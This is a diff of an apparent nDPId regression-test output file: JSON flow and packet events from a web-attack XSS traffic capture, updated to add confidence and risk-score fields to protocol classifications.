-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347212562,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347214088,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347214088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347214088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KIZAAD4GnUqsEAABwKgKMtYYAFAozfALAAAAAKACchCV+wAAAgQFtAQCCAoBOdiNAAAAAAEDAwc="}
@@ -748,14 +748,14 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347222706,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347224338,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347224338,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347224338,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K5xAAD4GmjSsEAABwKgKMtaEAFDFiskTAAAAAKACchAVyAAAAgQFtAQCCAoBOeKPAAAAAAEDAwc="}
@@ -777,18 +777,18 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347232982,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
